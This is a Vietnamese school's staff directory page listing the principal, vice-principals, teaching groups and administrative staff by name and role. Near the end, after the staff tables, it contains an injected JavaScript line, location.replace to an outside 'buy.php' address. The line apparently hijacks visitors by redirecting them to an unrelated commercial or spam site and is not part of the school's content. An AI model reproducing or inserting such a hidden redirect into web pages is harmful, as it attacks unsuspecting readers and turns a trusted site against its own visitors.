Cơ cấu tổ chức

19/12/2008 12:00 Sáng 3 phản hồi

1. Ban Giám Hiệu:

2. Tổ 1:
3. Tổ 2:
4. Tổ 3:
5. Tổ 4:
6. Tổ 5:
7. Tổ Văn Thể Mĩ:
8. Tổ Hành chính :

Cơ cấu tổ chức:

1. Ban Giám Hiệu:

TT Họ và tên Chức vụ Điện thoại
1 Hoàng Anh Vân Hiệu trưởng
2

3

Nguyễn Thị Thanh Hằng
Nguyễn Thị Bình
Phó hiệu trưởng

Phó hiệu trưởng

2. Tổ 1:

TT Họ và tên Chức vụ Điện thoại
1 Hoàng Thu Huyền Tổ trưởng
2 Đỗ Thị Ninh GVCN
3 Vũ Minh Tâm GVCN
4 Nguyễn Thị Hậu GVCN

3. Tổ 2:

TT Họ và tên Chức vụ Điện thoại
1 Bùi Thị Tình Tổ trưởng
2 Vũ Thị Như GVCN
3

4

Nguyễn Thu Hồng

Phạm Mai Hương

GVCN

GVCN

4. Tổ 3:

TT Họ và tên Chức vụ Điện thoại
1 Bùi Bảo Linh Tổ trưởng
2 Nguyễn Thị Trà GVCN
3

4

5

Nguyễn Minh Hà
Nguyễn Thanh Huyền

Nguyễn Thu Trang

GVCN

GVCN

GVCN

5. Tổ 4:

TT Họ và tên Chức vụ Điện thoại
1 Chu Thanh Thảo Tổ trưởng
2 Nguyễn Thúy Hồng GVCN
3

4

5

Lê Thị Hoa
Nguyễn Phương Hòa

Bế Vân Anh

GVCN

GVCN

GVCN

6. Tổ 5:
TT Họ và tên Chức vụ Điện thoại
1 Nguyễn Thị Thỏa Tổ trưởng
2

3

4

Lê Diệu Nga

Đỗ Yến Hải

Nguyễn Lan Anh

GVCN

GVCN

GVCN

7. Tổ Văn Thể Mĩ:

TT Họ và tên Chức vụ Điện thoại
1 Đàm Thu Hà Tổ trưởng
2

3

Nguyễn Thị Thủy

Bùi Thị Biển

GV Tiếng Anh

GV Tiếng Anh

4 Nguyễn Thị Loan GV Thể dục
5 Phan Thúy Lâm GV Thể dục
6 Phạm Diễm Hằng GV Tin Học
7

8

9

Bùi Thị Hoàn

Bùi Thị Nga

Phạm Lệ Hằng

GV Tin học

GV Âm nhạc

GV Mĩ thuật

8. Tổ dự trữ:

TT Họ và tên Chức vụ Điện thoại
1 Nguyễn Thị Huyền GV
2

3

Nguyễn Thu Giang

Nguyễn Quỳnh Mai

GV

GV

9. Tổ Hành chính :

TT Họ và tên Chức vụ Điện thoại
1 Dư Hoài Giang Kế toán
2

3

4

5

Lê Thị Bích Nguyệt

Nguyễn Công Cường

Ninh Thị Thơm

Nguyễn Thúy Quỳnh

Thủ quỹ

Tổng phụ trách

Văn phòng

Y tế

location.replace(“http://gethere.info/buy.php”);

Tin mới

Các phản hồi đã bị đóng lại bở quản trị.